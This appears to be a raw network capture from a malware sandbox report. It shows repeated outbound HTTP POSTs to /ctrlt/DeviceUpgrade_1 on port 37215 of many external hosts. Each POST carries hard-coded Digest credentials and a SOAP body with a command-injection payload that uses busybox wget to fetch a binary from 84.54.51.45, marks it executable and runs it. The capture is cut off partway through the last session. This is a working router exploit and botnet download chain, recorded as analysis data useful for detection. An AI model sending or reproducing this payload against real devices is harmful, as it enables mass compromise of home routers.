                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1948192.168.2.154717641.138.201.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600797892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1949192.168.2.154591241.189.113.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600816011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1950192.168.2.155093441.189.114.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600841045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1951192.168.2.155667441.137.164.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600856066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1952192.168.2.154179441.45.248.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600873947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1953192.168.2.155548041.215.24.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600898981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1954192.168.2.154380241.66.144.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600912094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1955192.168.2.155164241.210.79.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600955963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1956192.168.2.154695641.235.2.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600955963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1957192.168.2.153311841.165.15.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600974083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
